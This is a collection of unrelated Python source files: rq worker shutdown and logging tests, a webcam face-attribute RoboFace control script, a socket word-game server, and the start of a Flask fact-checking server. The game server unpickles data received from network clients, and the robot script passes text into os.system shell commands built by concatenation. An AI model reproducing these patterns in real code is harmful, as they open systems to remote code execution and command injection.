self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
time.sleep(time_to_wait)
os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
def setUp(self):
# we want tests to fail if signal are ignored and the work remain
# running, so set a signal to kill them after X seconds
self.killtimeout = 15
signal.signal(signal.SIGALRM, self._timeout)
signal.alarm(self.killtimeout)
def _timeout(self, signal, frame):
raise AssertionError(
"test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
)
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
@slow
def test_idle_worker_warm_shutdown(self):
"""worker with no ongoing job receiving single SIGTERM signal and shutting down"""
w = Worker('foo')
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(1)
self.assertFalse(w._stop_requested)
@slow
def test_working_worker_warm_shutdown(self):
"""worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_warm'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(2)
self.assertFalse(p.is_alive())
self.assertTrue(w._stop_requested)
self.assertTrue(os.path.exists(sentinel_file))
self.assertIsNotNone(w.shutdown_requested_date)
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')
@slow
def test_working_worker_cold_shutdown(self):
"""Busy worker shuts down immediately on double SIGTERM signal"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_cold'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), True))
p.start()
self.assertRaises(SystemExit, w.work)
p.join(1)
self.assertTrue(w._stop_requested)
self.assertFalse(os.path.exists(sentinel_file))
shutdown_requested_date = w.shutdown_requested_date
self.assertIsNotNone(shutdown_requested_date)
self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')
@slow
def test_work_horse_death_sets_job_failed(self):
"""worker with an ongoing job whose work horse dies unexpectadly (before
completing the job) should set the job's status to FAILED
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
p.start()
w.monitor_work_horse(job, queue)
job_status = job.get_status()
p.join(1)
self.assertEqual(job_status, JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
@slow
def test_work_horse_force_death(self):
"""Simulate a frozen worker that doesn't observe the timeout properly.
Fake it by artificially setting the timeout of the parent process to
something much smaller after the process is already forked.
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(launch_process_within_worker_and_store_pid, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
job.timeout = 5
w.job_monitoring_interval = 1
now = utcnow()
time.sleep(1)
with open(sentinel_file) as f:
subprocess_pid = int(f.read().strip())
self.assertTrue(psutil.pid_exists(subprocess_pid))
w.monitor_work_horse(job, queue)
fudge_factor = 1
total_time = w.job_monitoring_interval + 65 + fudge_factor
self.assertTrue((utcnow() - now).total_seconds() < total_time)
self.assertEqual(job.get_status(), JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
self.assertFalse(psutil.pid_exists(subprocess_pid))
def schedule_access_self():
q = Queue('default', connection=get_current_connection())
q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
def setUp(self):
super(TestWorkerSubprocess, self).setUp()
db_num = self.testconn.connection_pool.connection_kwargs['db']
self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num
def test_run_empty_queue(self):
"""Run the worker in its own process with an empty queue"""
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
def test_run_access_self(self):
"""Schedule a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
def test_run_scheduled_access_self(self):
"""Schedule a job that schedules a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(schedule_access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
def setUp(self):
super(HerokuWorkerShutdownTestCase, self).setUp()
self.sandbox = '/tmp/rq_shutdown/'
os.makedirs(self.sandbox)
def tearDown(self):
shutil.rmtree(self.sandbox, ignore_errors=True)
@slow
def test_immediate_shutdown(self):
"""Heroku work horse shutdown with immediate (0 second) kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
@slow
def test_1_sec_shutdown(self):
"""Heroku work horse shutdown with 1 second kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
time.sleep(0.1)
self.assertEqual(p.exitcode, None)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
@slow
def test_shutdown_double_sigrtmin(self):
"""Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
# we have to wait a short while otherwise the second signal wont bet processed.
time.sleep(0.1)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
@mock.patch('rq.worker.logger.info')
def test_handle_shutdown_request(self, mock_logger_info):
"""Mutate HerokuWorker so _horse_pid refers to an artificial process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
path = os.path.join(self.sandbox, 'shouldnt_exist')
p = Process(target=create_file_after_timeout_and_setsid, args=(path, 2))
p.start()
self.assertEqual(p.exitcode, None)
time.sleep(0.1)
w._horse_pid = p.pid
w.handle_warm_shutdown_request()
p.join(2)
# would expect p.exitcode to be -34
self.assertEqual(p.exitcode, -34)
self.assertFalse(os.path.exists(path))
mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)
def test_handle_shutdown_request_no_horse(self):
"""Mutate HerokuWorker so _horse_pid refers to non existent process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
w._horse_pid = 19999
w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
def setUp(self):
super(TestExceptionHandlerMessageEncoding, self).setUp()
self.worker = Worker("foo")
self.worker._exc_handlers = []
# Mimic how exception info is actually passed forwards
try:
raise Exception(u"๐ช")
except Exception:
self.exc_info = sys.exc_info()
def test_handle_exception_handles_non_ascii_in_exception_message(self):
"""worker.handle_exception doesn't crash on non-ascii in exception message."""
self.worker.handle_exception(Mock(), *self.exc_info)
class TestRoundRobinWorker(RQTestCase):
def test_round_robin(self):
qs = [Queue('q%d' % i) for i in range(5)]
for i in range(5):
for j in range(3):
qs[i].enqueue(say_pid,
job_id='q%d_%d' % (i, j))
w = RoundRobinWorker(qs)
w.work(burst=True)
start_times = []
for i in range(5):
for j in range(3):
job = Job.fetch('q%d_%d' % (i, j))
start_times.append(('q%d_%d' % (i, j), job.started_at))
sorted_by_time = sorted(start_times, key=lambda tup: tup[1])
sorted_ids = [tup[0] for tup in sorted_by_time]
expected = ['q0_0', 'q1_0', 'q2_0', 'q3_0', 'q4_0',
'q0_1', 'q1_1', 'q2_1', 'q3_1', 'q4_1',
'q0_2', 'q1_2', 'q2_2', 'q3_2', 'q4_2']
self.assertEqual(expected, sorted_ids)
class TestRandomWorker(RQTestCase):
def test_random_worker(self):
qs = [Queue('q%d' % i) for i in range(5)]
for i in range(5):
for j in range(3):
qs[i].enqueue(say_pid,
job_id='q%d_%d' % (i, j))
w = RandomWorker(qs)
w.work(burst=True)
start_times = []
for i in range(5):
for j in range(3):
job = Job.fetch('q%d_%d' % (i, j))
start_times.append(('q%d_%d' % (i, j), job.started_at))
sorted_by_time = sorted(start_times, key=lambda tup: tup[1])
sorted_ids = [tup[0] for tup in sorted_by_time]
expected_rr = ['q%d_%d' % (i, j) for j in range(3) for i in range(5)]
expected_ser = ['q%d_%d' % (i, j) for i in range(5) for j in range(3)]
self.assertNotEqual(sorted_ids, expected_rr)
self.assertNotEqual(sorted_ids, expected_ser)
expected_rr.reverse()
expected_ser.reverse()
self.assertNotEqual(sorted_ids, expected_rr)
self.assertNotEqual(sorted_ids, expected_ser)
sorted_ids.sort()
expected_ser.sort()
self.assertEqual(sorted_ids, expected_ser)
|
run2017.py | # -*- coding: utf-8 -*-
"""
Running the trained neural network, normalise image and control RoboFace.
Copyright (C) 2017 Letitia Parcalabescu
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import cv2
import numpy as np
from keras.models import load_model
# from scipy import misc
from scipy.misc import imresize
from skimage.transform import resize, rotate
import h5py
import math
import face
from gtts import gTTS
from pygame import mixer, time
import os, subprocess, signal, psutil
from threading import Thread, Event
from time import sleep, time
from scipy.io import wavfile
from scipy.ndimage.filters import maximum_filter1d,gaussian_filter
from nltk.tokenize import sent_tokenize
import string
IMAGE_SIZE = (128, 128)
IOD = 40.0
def imgCrop(image, cropBox, boxScale=1):
'''
Crop an area around the detected face (by OpenCV) in order to feed it into the prediction algorithm (NN).
'''
off = 90
y = max(cropBox[1] - 3*off, 0)
x = max(cropBox[0] - 2*off, 0)
off = 50
y = max(cropBox[1] - 3*off, y)
x = max(cropBox[0] - 2*off, x)
off = 20
y = max(cropBox[1] - 3*off, y)
x = max(cropBox[0] - 2*off, x)
cropped = image[y:cropBox[1]+cropBox[3]+90, x:cropBox[0]+cropBox[2]+30]
dims = cropped.shape
return cropped, x, y
def rotateBound(image, angle, center):
'''
Rotates image. Used for image normalisation, so that the inter-ocular line is always horizontal for the NN.
'''
(cX, cY) = center
(h, w) = image.shape[:2]
# grab the rotation matrix (applying the negative of the
# angle to rotate clockwise), then grab the sine and cosine
# (i.e., the rotation components of the matrix)
M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
cos = np.abs(M[0, 0])
sin = np.abs(M[0, 1])
# compute the new bounding dimensions of the image
nW = int((h * sin) + (w * cos))
nH = int((h * cos) + (w * sin))
# adjust the rotation matrix to take into account translation
M[0, 2] += (nW / 2) - cX
M[1, 2] += (nH / 2) - cY
# perform the actual rotation and return the image
return cv2.warpAffine(image, M, (nW, nH))
def normaliseImage(image, eyes, xcrop, ycrop):
'''
Normalize faces usinginter-ocular distance i.o.d
'''
# resite, such that i.o.d is always same
left_eye = eyes[0] + np.array([xcrop, ycrop, 0, 0])
right_eye = eyes[1] + np.array([xcrop, ycrop, 0, 0])
scale = IOD / np.linalg.norm(left_eye - right_eye)
left_eye = scale * left_eye
right_eye = scale * right_eye
im = resize(image, (int(scale*image.shape[0]), int(scale*image.shape[1])), mode='edge')
# rotate to keep inter ocular line horizontal
diff = np.subtract(left_eye, right_eye)
angle = math.atan2(diff[0], diff[1])
im = rotate(im, -angle,center=(left_eye[0],left_eye[1]), preserve_range=True, mode='edge')
# new resizing for making the image compatible with the trained NN.
iod = np.linalg.norm(left_eye - right_eye)
xmin = int(left_eye[0]-1.6*iod)
xmax = int(left_eye[0]+2*iod)
ymin = int(left_eye[1]-1.3*iod)
ymax = int(right_eye[1]+1.3*iod)
xmin = max(0, xmin)
xmax = min(im.shape[0], xmax)
ymin = max(0, ymin)
ymax = min(im.shape[1], ymax)
im = im[xmin:xmax, ymin:ymax, :]
try:
im = resize(im, IMAGE_SIZE, mode='edge')
except: return None
return im
def detectFace(image):
# http://docs.opencv.org/trunk/d7/d8b/tutorial_py_face_detection.html
face_cascade = cv2.CascadeClassifier('../face_detection/haarcascade_frontalface_alt.xml')
eye_cascade = cv2.CascadeClassifier('../face_detection/haarcascade_eye.xml')
smile_cascade = cv2.CascadeClassifier('../face_detection/haarcascade_smile.xml')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# for each detected face, detect eyes and smile
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
unaltered_image = image.copy()
eyes = None
normalised_image = None
for face in faces:
(x,y,w,h) = face
# show face bounding box on Webcam Preview
cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = image[y:y+h, x:x+w]
# normalise image in order to predict on it
# croppedImage = imgCrop(image, face, boxScale=1)
# detect eyes for Inter Oculat Distance
eyes = eye_cascade.detectMultiScale(roi_gray)
if len(eyes) == 2:
left_eye = eyes[0][0:2] + x
right_eye = eyes[1][0:2] + y
eyex = int((left_eye[0] + right_eye[0])*.5)
eyey = int((left_eye[1] + right_eye[1])*.5)
roboFace.moveHead(eyex, eyey)
# suggestion: skip this frame as prediction, so return None, image
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
if len(eyes) == 2 and np.abs(eyes[0,1] - eyes[1,1]) < 10:
offset1 = np.sqrt((eyes[0,2]**2+eyes[0,3]**2))*0.5
offset2 = np.sqrt((eyes[1,2]**2+eyes[1,3]**2))*0.5
real_eyes = eyes + np.array([[x+offset1,y+offset1,0,0],[x+offset2,y+offset2,0,0]])
real_eyes = np.sort(real_eyes, axis = 0)
cropped_image, xcrop, ycrop = imgCrop(unaltered_image, face)
normalised_image = normaliseImage(cropped_image, real_eyes, -xcrop, -ycrop)
return normalised_image, image
def mapAttributes(classes):
'''
Map the output probabilities to the correpsonding names, like 'smile', etc.
'''
with open('../face_detection/wanted_attributes_normalised.txt', 'r') as f:
attributes = f.read()
attributes = attributes.strip('\n').split(' ')
result = []
for i, cl in enumerate(classes):
if cl == True:
result.append(attributes[i])
return result
################################################################################
# Declaration of: say - Talk - MoveLips
################################################################################
def Undersampled_Lip_Tragectory(phrase,Sleep_Time):
A ="espeak -z -s 80 -v female5 -w test.wav "
A=A + "'" + phrase + "'"
#os.system("espeak -z -s 80 -v female5 -w test.wav 'Hey, why no one is looking at me? I feel neglected. I feel it! I am afraid!' ")
os.system(A)
samplerate, data = wavfile.read('test.wav')
dt=1/float(samplerate)
times = np.arange(len(data))/float(samplerate)
N=len(times)
max_data=maximum_filter1d(data,size=1000)
max_data=gaussian_filter(max_data,sigma=100)
max_Amplitude=10
Amplitude=max_Amplitude*(max_data/float(np.max(max_data)))
n=Sleep_Time*samplerate
Amp=[]
T=[]
i=0
while (i*n<=N):
Amp.append(Amplitude[int(i*n)])
T.append(times[int(i*n)])
i=i+1
Amp=np.array(Amp)
T=np.array(T)
return Amp,T
def MoveLips(Sleep_Time, Amplitude, flag):
roboFace.setSpeedLips(127)
i=0
while flag.isSet() and i < len(Amplitude):
roboFace.moveLips(int(Amplitude[i]))
sleep(Sleep_Time)
i = i + 1
if ~flag.isSet():
roboFace.moveLips(0)
sleep(0.05)
def Talk(phrase, flag):
A = "espeak -z -s 80 -v female5 "
A = A + "'" + phrase + "'"
os.system(A)
flag.clear()
def say(text,flag):
phrases=sent_tokenize(text)
for phrase in phrases:
phrase=phrase.replace("'"," ")
flag = Event()
flag.set()
Sleep_Time=0.05
Amplitude,Time=Undersampled_Lip_Tragectory(phrase,Sleep_Time)
thread_movement = Thread(target=MoveLips, args=(Sleep_Time, Amplitude, flag))
thread_talk = Thread(target=Talk, args=(phrase, flag))
thread_talk.start()
thread_movement.start()
thread_talk.join()
thread_movement.join()
#mixer.init()
#mixer.music.play()
################################################################################
# End of Declaration: say - Talk - MoveLips
################################################################################
def sayDoSomething(pred_attr):
talk = {'Smiling': 'I like it when people smile at me!',
'Female': 'You are a female, am I right?',
'Male': 'You are a male, am I right?',
'Wearing_Earrings': 'You are wearing beautiful earrings today!',
'Wearing_Lipstick': 'I see you are wearing lipstick today. Pretty!',
'Blond_Hair': 'Nice blond hair!',
'Eyeglasses': 'You are wearing eyeglasses!',
'Brown_Hair': 'You have nice brown hair!',
'Black_Hair': 'You have nice black hair!',
'Gray_Hair': 'You must be a wise man, judging by your gray hair!',
'Wavy_Hair': 'You have nice wavy hair!',
'Straight_Hair': 'You have nice straight hair.'
}
#talk = {'Smiling': 'Es ist so schรถn, wenn mich Menschen anlรคcheln!',
# 'Female': 'Bist du eine Frau, oder?',
# 'Male': 'Bist du denn ein Mann?',
# 'Wearing_Earrings': 'Du trรคgst wunderschรถne Ohrringe!',
# 'Wearing_Lipstick': 'Ich merke, dass du Lippenstift trรคgst. Schรถn!',
# 'Blond_Hair': 'Schรถne blonde Haare hast du!',
# 'Eyeglasses': 'Du trรคgst Brillen.',
# 'Brown_Hair': 'Du hast schรถne braune Haare!',
# 'Black_Hair': 'Du hast wuunderschรถne schwarze Haare!',
# 'Gray_Hair': 'Du musst eine sehr weise Person sein, da du graue Haare hast.',
# 'Wavy_Hair': 'Du hast schรถne lockige Haare!',
# 'Straight_Hair': 'Du hast schรถne glatte Haare!'
# }
if 'Smiling' in pred_attr:
roboFace.happy(moveHead=False)
elif 'Black_Hair' in pred_attr:
roboFace.angry(moveHead=False)
elif 'Eyeglasses' in pred_attr:
roboFace.unsure(moveHead=False)
else:
roboFace.neutral(moveHead=False)
index = np.random.randint(0, len(pred_attr))
say(talk[pred_attr[index]],flag)
def getProbaStream(probStream, probs):
if probStream == None:
probStream = probs
else:
probStream = np.vstack((probStream, probs))
return probStream
if __name__ == "__main__":
roboFace = face.Face(x_weight=0.8, y_weight=0.2)
#################################################################
# Set Speed for smoother movement
roboFace.setSpeedAll(100)
roboFace.setSpeedHead(80)
flag = Event()
flag.clear()
#################################################################
roboFace.neutral()
# with h5py.File('trained/trained_webcam.h5', "a") as f:
# try:
# del f['/optimizer_weights']
# except KeyError:
# print('Already deleted optimizer_weights due to incompatibility between keras versions. Nothing to be done here.')
# load the trained neural network
model = load_model('../face_detection/trained/pretrained_CelebA_normalised0203-05.h5')
cv2.namedWindow("Webcam Preview")
vc = cv2.VideoCapture(1) # 0 for built-in webcam, 1 for robot
if vc.isOpened(): # try to get the first frame
rval, frame = vc.read()
else:
rval = False
probStream = None
saidNothing = 0
process = None
while rval:
normalised_image, frame = detectFace(frame)
# if a face is detected and the normalisation was successful, predict on it
if normalised_image is not None:
normalised_image = normalised_image[:,:,::-1]
# subtract mean face
meanFace = np.load('../face_detection/mean_face_normalised.npy')
X_test = np.expand_dims(normalised_image, axis=0)
X_test -= meanFace
classes = model.predict_classes(X_test, batch_size=32, verbose=0)
proba = model.predict_proba(X_test, batch_size=32, verbose=0)
# pred_attr = mapAttributes((proba > 0.6)[0])
# print( proba)
# print(pred_attr)
probStream = getProbaStream(probStream, proba)
if saidNothing == 0 and probStream.shape[0] < 10:
saidNothing += 1
cv2.imshow("Webcam Preview", frame)
rval, frame = vc.read()
key = cv2.waitKey(20)
if key == 27: # exit on ESC
if process != None:
os.kill(process.pid, signal.SIGTERM)
say("I'm sorry Dave. I'm afraid I can't do that.",flag)
while flag.isSet():
time.Clock().tick(10)
break
elif probStream.shape[0] > 10 and len(probStream.shape) >= 2:
if process != None:
os.kill(process.pid, signal.SIGTERM)
process = None
meanProbs = np.mean(probStream, axis=0)
pred_attr = mapAttributes(meanProbs > 0.6)
best = []
if meanProbs[0] > meanProbs [1] and meanProbs[0] > meanProbs [4] and meanProbs[0] > meanProbs[2]:
best.append('Black_Hair')
elif meanProbs[1] > meanProbs [0] and meanProbs[1] > meanProbs [4] and meanProbs[1] > meanProbs[2]:
best.append('Blond_Hair')
elif meanProbs[2] > meanProbs [0] and meanProbs[2] > meanProbs [1]:
best.append('Brown_Hair')
if meanProbs[9] < meanProbs[10]:
best.append('Straight_Hair')
else:
best.append('Wavy_Hair')
if meanProbs[3] > 0.6:
best.append('Eyeglasses')
if meanProbs[8] > 0.6:
best.append('Smiling')
if meanProbs[11] > 0.2:
best.append('Wearing_Earrings')
if meanProbs[12] > 0.2:
best.append('Wearing_Lipstick')
# if meanProbs[12] > 0.11 and meanProbs[11] > 0.11 and meanProbs[5] < 0.6:
if meanProbs[5] < 0.25:
best.append('Female')
elif meanProbs[12] < 0.11 and meanProbs[11] < 0.11 and meanProbs[5] > 0.85:
best.append('Male')
print(meanProbs)
print("BEST", best)
# end NN stuff
# postprocessing and reaction step
sayDoSomething(best)
saidNothing = 0
while flag.isSet():
_, frame = detectFace(frame)
probStream = None
cv2.imshow("Webcam Preview", frame)
rval, frame = vc.read()
key = cv2.waitKey(20)
if key == 27: # exit on ESC
if process != None:
os.kill(process.pid, signal.SIGTERM)
say("I'm sorry Dave. I'm afraid I can't do that.",flag)
while flag.isSet():
time.Clock().tick(10)
break
elif saidNothing > 10000000:
saidNothing = 0
roboFace.sad()
say("Hey, why is no one looking at me? I feel neglected. I feel it. I feel it! I am afraid!",flag)
#say("Hei, wieso nimmt mich keiner in Acht? Ich fรผhle mich vernachlรคssigt...",flag)
while flag.isSet():
_, frame = detectFace(frame)
probStream = None
cv2.imshow("Webcam Preview", frame)
rval, frame = vc.read()
key = cv2.waitKey(20)
if key == 27: # exit on ESC
if process != None:
os.kill(process.pid, signal.SIGTERM)
say("I'm sorry Dave. I'm afraid I can't do that.",flag)
while flag.isSet():
time.Clock().tick(10)
break
if process == None:
process = subprocess.Popen(['rhythmbox', 'creepyMusic.mp3'])
else:
saidNothing += 1
cv2.imshow("Webcam Preview", frame)
rval, frame = vc.read()
key = cv2.waitKey(20)
if key == 27: # exit on ESC
if process != None:
os.kill(process.pid, signal.SIGTERM)
say("I'm sorry Dave. I'm afraid I can't do that.",flag)
while flag.isSet():
time.Clock().tick(10)
break
cv2.destroyWindow("Webcam Preview")
# Black_Hair Blond_Hair Brown_Hair Eyeglasses Gray_Hair Male
# Mouth_Slightly_Open No_Beard Smiling Straight_Hair Wavy_Hair Wearing_Earrings Wearing_Lipstick
|
server.py | import json
import time
import random
import socket
import pickle
import logging
import threading
from string import ascii_lowercase
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.DEBUG,
datefmt='%Y-%m-%d %H:%M:%S'
)
IP = "192.168.1.12"
PORT = 1234
SOLUTION_FILE = "solution_words.json"
SETTINGS_FILE = "settings.json"
HEADERSIZE = 10
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((IP, PORT))
server_socket.listen(10)
clients = []
class PreGame:
def __init__(self):
self.participating_clients = list(clients)
self.width = None
self.height = None
self.word = None
def run_pregame(self):
self.get_settings()
self.get_word()
self.send_data()
def get_settings(self):
settings = read_file(SETTINGS_FILE)
self.width = settings["board_width"]
self.height = settings["board_height"]
def get_word(self):
if self.width > 1:
try:
# Read the solution words file
with open(f"words/{self.width}.txt") as f:
words = f.read().splitlines()
self.word = random.choice(words)
except FileNotFoundError:
logging.critical(f"File words/{self.width}.txt not found.")
exit()
else:
self.word = random.choice(ascii_lowercase)
def send_data(self):
for client in self.participating_clients:
send(client, "game start")
send(client, (self.width, self.height))
send(client, self.word)
class Game:
def __init__(self):
self.participating_clients = list(clients)
self.times = {}
def run_game(self):
self.generate_leaderboard()
self.send_leaderboard()
def generate_leaderboard(self):
start_time = time.time()
for client in self.participating_clients:
finished = receive(client)
if not finished:
continue
username = receive(client)
if finished == "found word":
self.times[username] = time.time() - start_time
else:
self.times[username] = "Incomplete"
def send_leaderboard(self):
for client in self.participating_clients:
send(client, self.times)
def manage_clients():
logging.info("Waiting for clients to connect")
while True:
clientsocket, address = server_socket.accept()
clients.append(clientsocket)
logging.info(f"Client connected. {len(clients)} clients connected.")
def send(client_socket, message):
logging.debug(f"Sending message {message}")
try:
message = pickle.dumps(message)
message = f"{len(message):<{HEADERSIZE}}".encode("utf-8") + message
client_socket.send(message)
except ConnectionResetError:
clients.remove(client_socket)
logging.info("ConnectionResetError: Client disconnected when attempting to send data.")
def receive(client_socket):
logging.debug("Receiving message")
message_header = b""
try:
while len(message_header) < HEADERSIZE:
read = client_socket.recv(HEADERSIZE - len(message_header))
if not read:
clients.remove(client_socket)
logging.info("Client disconnected when attempting to receive data.")
return
message_header += read
message_length = int(message_header.decode('utf-8').strip())
return pickle.loads(client_socket.recv(message_length))
except ConnectionResetError:
logging.info("ConnectionResetError: Client disconnected when attempting to receive data.")
def read_file(filename):
with open(filename, "r") as f:
return json.load(f)
def main():
# Start manage clients thread
t = threading.Thread(target=manage_clients)
t.start()
while True:
while len(clients) >= 1:
# Run pregame
pg = PreGame()
pg.run_pregame()
# Run game
g = Game()
g.run_game()
time.sleep(3) # Wait 3 seconds inbetween games
if __name__ == "__main__":
main()
|
server.py | print(" * [i] Loading Python modules...")
import time
import numpy as np
import flask
import urllib3
from newspaper import Article
from threading import Thread
from claimreview import ClaimReview
cr = ClaimReview()
print(" * [i] Loading NLP models...")
from model_nlp import *
app = flask.Flask(__name__)
model_clickbait = None
model_profile = None
model_subj = None
urllib3.disable_warnings()
np.warnings.filterwarnings('ignore')
def load_ML():
